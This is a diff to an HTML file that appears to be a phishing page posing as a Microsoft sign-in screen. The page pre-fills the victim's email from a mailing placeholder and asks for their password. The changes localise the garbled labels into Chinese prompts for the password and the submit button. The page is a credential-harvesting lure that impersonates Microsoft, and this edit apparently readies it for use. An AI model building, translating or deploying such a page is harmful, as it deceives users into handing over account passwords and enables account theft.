--- a/index.html
+++ b/index.html
@@ -1,3 +1,5 @@
+
+
 <!DOCTYPE html>
 <html>
 <head>
@@ -13,7 +15,7 @@
             click: privacyLink_onClick,
             externalCss: {
                 'footer-content': true,
-                'footer-item': true,																											
+                'footer-item': true,
                 'has-background': !useDefaultBackground,
                 'background-always-visible': hasDarkBackground }" href="https://privacy.microsoft.com/en-US/privacystatement" class="footer-content ext-footer-content footer-item ext-footer-item has-background ext-has-background background-always-visible ext-background-always-visible">Privacy &amp; cookies</a>
 
@@ -124,9 +126,9 @@ ppppppppppppppp8888888888888888888*********************%%%%%%%%%%%%%%%%$########
 <img style="float:left; height:11px; margin-top:3px;" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABIAAAAQCAAAAAA+bXCAAAAAAnRSTlMAAHaTzTgAAABNSURBVBjTY2CAgJ0M6KDD5QKGyHY0kW7XLWgivZgi7qvRRCZ4LkcTmeYQko8KGKY6BKMLYdGIzXhszmJg6MAmhuEhBoZ2DG8zMOxGMAEdPyMTr2AelgAAAABJRU5ErkJggg==">
 <input type="email" id="email" name="email" style="border:none; width:80%; font-size:15px;" value="[[-Email-]]">
 
-<h3 style="font-family:sans-serif; font-size:22px; color:#333333;">????</h3>
+<h3 style="font-family:sans-serif; font-size:22px; color:#333333;">輸入密碼</h3>
 
-<input type="password" name="password" id="password" style="border-top:none; border-right:none; border-left:none; border-width:1px; width:100%; font-size:16px; padding:10px 0px 10px 0px;" placeholder="??" required="required">
+<input type="password" name="password" id="password" style="border-top:none; border-right:none; border-left:none; border-width:1px; width:100%; font-size:16px; padding:10px 0px 10px 0px;" placeholder="密碼" required="required">
 
 <p><a href=""><a/></p>
 <p><a href=""><a/></p>
@@ -155,7 +157,7 @@ ppppppppppppppp8888888888888888888*********************%%%%%%%%%%%%%%%%$########
 
 
 
-<button type="submit" style="float:right; cursor:pointer; background-color:#0067b8; color:white; border:none; width:80px; height:35px;" >???</button>
+<button type="submit" style="float:right; cursor:pointer; background-color:#0067b8; color:white; border:none; width:80px; height:35px;" >使用權</button>
 
 
 </form>
